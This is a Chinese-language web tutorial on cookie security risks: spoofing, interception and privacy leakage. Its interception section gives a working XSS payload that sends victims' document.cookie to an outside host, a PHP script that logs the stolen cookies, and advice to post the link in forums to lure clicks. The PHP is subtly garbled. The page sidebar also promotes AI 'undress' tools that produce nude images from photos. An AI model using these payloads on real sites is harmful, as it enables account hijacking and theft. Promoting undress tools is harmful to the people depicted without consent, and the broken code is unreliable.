社群
學習
工具庫
AI工具
休閒
搜尋
繁体中文
首頁 web前端 js教程 深入分析Cookie的安全性問題_cookie

深入分析Cookie的安全性問題_cookie

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
May 16, 2016 pm 04:12 PM
cookie 安全性

Cookie的目的是為使用者帶來方便,為網站帶來增值,一般情況下不會造成嚴重的安全威脅。 Cookie檔案不能作為程式碼執行,也不會傳送病毒,它為使用者所專有且只能由建立它的伺服器來讀取。另外,瀏覽器一般只允許存放300個Cookie,每個網站最多存放20個Cookie,每個Cookie的大小限制為4KB,因此,Cookie不會塞滿硬碟,更不會被用作"拒絕服務"攻擊手段。

但是,Cookie作為使用者身分的替代,其安全性有時決定了整個系統的安全性,Cookie的安全性問題不容忽視。

(1)Cookie欺騙 Cookie記錄了使用者的帳戶ID、密碼之類的訊息,通常使用MD5方法加密後在網路上傳遞。經過加密處理後的資訊即使被網路上一些別有用心的人截獲也看不懂。然而,現在存在的問題是,截獲Cookie的人不需要知道這些字串的意思,只要把別人的Cookie向伺服器提交,並且能夠通過驗證,就可以冒充受害人的身分登陸網站,這種行為叫做Cookie欺騙。
非法使用者透過Cookie欺騙取得相應的加密金鑰,從而存取合法使用者的所有個人化訊息,包括使用者的E-mail甚至帳戶訊息,對個人資訊造成嚴重危害。
(2)Cookie截獲
Cookie以純文字的形式在瀏覽器和伺服器之間傳送,很容易被他人非法截獲和利用。任何可以截獲Web通訊的人都可以讀取Cookie。
Cookie被非法使用者截獲後,然後在其有效期內重播,則此非法使用者將享有合法使用者的權益。例如,對於線上閱讀,非法用戶可以不支付費用即可享受在線閱讀電子雜誌。

Cookie截獲的手段有以下一些:

(1)用程式設計手段截獲Cookie。以下分析其手法,該方法分兩步驟完成。

步驟一:定位需要收集Cookie的網站,對其進行分析並建構URL。 首先打開要收集Cookie的網站,這裡假設是http://www.XXX.net,登陸網站輸入使用者名稱""(不含引號),對資料進行分析抓包,得到如下碼:
http://www.XXX.net/tXl/login/login.pl? username=&passwd=&ok.X=28&ok.y=6;
將其中""更換為:
"<script>alert(document.cookie)</script>"再試,如果執行成功,就開始建構URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
其中http://www.cbifamily.org/cbi.php是使用者能夠控制的某台主機上的一個腳本。需要注意的是"+"為符號" "的URL編碼,因為" "將會被當作空格處理。該URL即可在論壇中發布,誘使別人點擊。

步驟二:編製收集Cookie的PHP腳本,並將其放到使用者可以控制的網站上,當不知情者點擊了建構的URL後可以執行該PHP程式碼。腳本的具體內容如下:

複製程式碼 程式碼如下:

$info=getenv("OUERY_STRING");
if($info){ 
$fp=fopen("info.tXt","a"); 
fwrite($fp,!info."n");
fclose($fp);

header("Location:http://www.XXX.net");
?>

將這段程式碼放到網路裡,則能夠收集所有人的Cookie。如果一個論壇允許HTML程式碼或允許使用Flash標籤,就可以利用這些技術收集Cookie的程式碼放到論壇裡,然後給貼文取一個吸引人的主題,寫上有趣的內容,很快就可收集到大量的Cookie。在論壇上,有許多人的密碼就是被這種方法偷走的。
(2)利用Flash的代碼隱患截獲Cookie。 Flash中有一個getURL()函數。 Flash可以利用這個函數自動開啟指定的網頁,它可能會把使用者引導到一個包含惡意程式碼的網站。例如,當使用者在電腦上欣賞Flash動畫時,動畫幀裡的程式碼可能已經悄悄地連上網,並開啟了一個極小的包含有特殊程式碼的頁面,這個頁面可以收集Cookie、也可以做一些其他有害的事情。網站無法禁止Flash的這種作為,因為這是Flash檔案的內部功能。
(3)Cookie洩漏網路隱私
Cookie導致網路隱私洩密的主要原因是:!商業利益驅動。隨著電子商務的興起和互聯網上巨大商機的出現,一些網站和機構濫用Cookie,未經訪客的許可,利用搜尋引擎技術、資料探勘技術甚至是網路欺騙技術蒐集他人的個人資料,達到建構用戶資料庫、發送廣告等營利目的,造成用戶個人隱私的洩漏。 "Cookie訊息傳遞的開放性。Cookie檔案具有特殊的傳遞流程 和文字特性,在伺服器和用戶端之間傳送未經安全加密的Cook-ie文件,易導致個人資訊的洩密。

以上都是個人對於cookie安全性的理解,如有遺漏還請大家能夠指正。

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

顯示更多

熱門文章

刺客信條陰影:貝殼謎語解決方案
3 週前 By DDD
Windows 11 KB5054979中的新功能以及如何解決更新問題
2 週前 By DDD
在哪裡可以找到原子中的起重機控制鑰匙卡
3 週前 By DDD
<🎜>:死鐵路 - 如何完成所有挑戰
4 週前 By DDD
Atomfall指南:項目位置,任務指南和技巧
4 週前 By DDD
顯示更多

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

顯示更多

熱門話題

gmail信箱登陸入口在哪裡
7653
15
CakePHP 教程
1393
52
steam的賬戶名稱是什麼格式
91
11
win11激活密鑰永久
73
19
NYT迷你填字遊戲答案
37
110
顯示更多
Related knowledge
PHP5和PHP8的性能和安全性:對比和改進 PHP5和PHP8的性能和安全性:對比和改進 Jan 26, 2024 am 10:19 AM

PHP是一種廣泛應用的伺服器端腳本語言,用於開發網頁應用程式。它已經發展了多個版本,而本文將主要討論PHP5和PHP8之間的比較,特別關注其在性能和安全性方面的改進。首先讓我們來看看PHP5的一些特點。 PHP5是在2004年發布的,它引入了許多新的功能和特性,如物件導向程式設計(OOP)、異常處理、命名空間等。這些特性讓PHP5變得更強大、更靈活,使得開發者能

Golang開發的安全性挑戰:如何避免被利用用於病毒製作? Golang開發的安全性挑戰:如何避免被利用用於病毒製作? Mar 19, 2024 pm 12:39 PM

Golang開發的安全性挑戰:如何避免被利用用於病毒製作?隨著Golang在程式設計領域的廣泛應用,越來越多的開發者選擇使用Golang來開發各種類型的應用程式。然而,與其他程式語言一樣,Golang開發中也存在著安全性挑戰。特別是,Golang的強大功能和靈活性也使其成為潛在的病毒製作工具。本文將深入探討Golang開發中的安全性問題,並提供一些方法來避免G

Java 函數中記憶體管理技術與安全性的關係是什麼? Java 函數中記憶體管理技術與安全性的關係是什麼? May 02, 2024 pm 01:06 PM

Java中的記憶體管理涉及自動記憶體管理,使用垃圾回收和引用計數來分配、使用和回收記憶體。有效的記憶體管理對於安全性至關重要,因為它可以防止緩衝區溢位、野指標和記憶體洩漏,從而提高程式的安全性。例如,透過正確釋放不再需要的對象,可以避免記憶體洩漏,從而提高程式效能並防止崩潰。

瀏覽器cookie的儲存位置詳解 瀏覽器cookie的儲存位置詳解 Jan 19, 2024 am 09:15 AM

隨著網路的普及,我們使用瀏覽器進行上網已經成為一種生活方式。在日常使用瀏覽器過程中,我們常會遇到需要輸入帳號密碼的情況,如網購、社交、郵件等。這些資訊需要瀏覽器記錄下來,以便下次造訪時不需要再次輸入,這時候Cookie就派上了用場。什麼是Cookie? Cookie是指由伺服器端發送到使用者瀏覽器上並儲存在本地的一種小型資料文件,它包含了一些網站的使用者行為

win11是否需要安裝防毒軟體? win11是否需要安裝防毒軟體? Dec 27, 2023 am 09:42 AM

win11是自備防毒軟體的,一般來說殺毒的效果也都是很好的不需要裝,不過唯一的缺點就是看到病毒是先卸載了而不是提前提醒你是否需要,要是接受的話可以不用下載其他防毒軟體。 win11需要裝防毒軟體嗎:答:不需要一般來說win11是自備防毒軟體的,不需要我們額外的安裝。如果你不喜歡win11系統自帶防毒軟體的處理方式的話是可以重新安裝的。如何關閉win11自帶的防毒軟體:1、首先我們進入設定點擊「隱私和安全性」。 2、接著點選「window安全中心」。 3、然後選擇「病毒和威脅防護」。 4.最後就可以將其關

Cookie設定的常見問題及解決方案 Cookie設定的常見問題及解決方案 Jan 19, 2024 am 09:08 AM

Cookie設定的常見問題及解決方案,需要具體程式碼範例隨著網路的發展,Cookie作為一種最常見的常規技術,已廣泛應用於網站和應用程式中。 Cookie,簡單來說,是一種儲存在使用者電腦上的資料文件,可用於儲存使用者在網站上的信息,包括登入名稱、購物車內容、網站首選項等等。 Cookie對於開發人員來說是必不可少的工具,但同時,Cookie設定常常會遇到

如何尋找瀏覽器中的cookie 如何尋找瀏覽器中的cookie Jan 19, 2024 am 09:46 AM

在日常使用電腦與網路的過程中,我們常接觸到cookie。 Cookie是一種小型的文字文件,它保存了我們在網站上的存取記錄、偏好設定和其他資訊。這些資訊可以被網站使用,以便更好地為我們提供服務。但是有時候,我們需要找出cookie的信息,來找到我們要的內容。那我們該如何在瀏覽器中尋找cookie呢?首先,我們要先了解cookie的存在位置。在瀏覽器中

Oracle預設帳號密碼的安全性分析 Oracle預設帳號密碼的安全性分析 Mar 09, 2024 pm 04:24 PM

Oracle資料庫是一款受歡迎的關聯式資料庫管理系統,許多企業和組織都選擇使用Oracle來儲存和管理其重要資料。在Oracle資料庫中,有一些預設帳號和密碼是系統預設的,例如sys、system等。在日常的資料庫管理和維運工作中,管理員需要重視這些預設帳號密碼的安全性,因為這些帳號具有較高的權限,一旦被惡意利用,可能導致嚴重的安全性問題。本文將對Oracle默

See all articles